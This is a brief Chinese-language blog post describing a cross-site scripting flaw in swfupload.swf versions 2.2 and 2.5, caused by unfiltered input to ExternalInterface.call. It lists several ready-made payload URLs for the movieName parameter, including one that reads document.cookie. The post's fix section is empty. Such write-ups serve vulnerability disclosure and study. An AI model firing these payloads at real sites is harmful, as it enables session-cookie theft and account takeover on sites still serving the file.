swfupload xss漏洞
1、出问题的版本包括 V2.2\V2.5
2、查看漏洞效果
由于swfupload.swf未对actionscript函数ExternalInterface.call传入的值进行判断和过滤,可以通过构造javascript语句通过ExternalInterface.call函数传递到flash文件中,造成flash跨站。Payload如下:
swfupload.swf?movieName=aaa"])}catch(e){(alert)(1)};//
swfupload.swf?movieName=aaa"])}catch(e){alert(1)};//
swfupload.swf?movieName="])}catch(e){if(!window.x){window.x=1;(alert)(1)}}//
swfupload.swf?movieName="])}catch(e){if(!window.x){window.x=1;alert(1)}}//
http://localhost:9000/javascripts/swfupload.swf?movieName=%22%5D)%7Dcatch(e)%7Bif(!window.x)%7Bwindow.x=1;alert(document.cookie)%7D%7D//
3、修复版本
4、flash xss漏洞及相关知识点
https://wizardforcel.gitbooks.io/xss-naxienian/content/14.html
标题:swfupload xss漏洞
作者:hugh0524
地址:https://blog.uproject.cn/articles/2016/12/14/1481689313203.html
0 0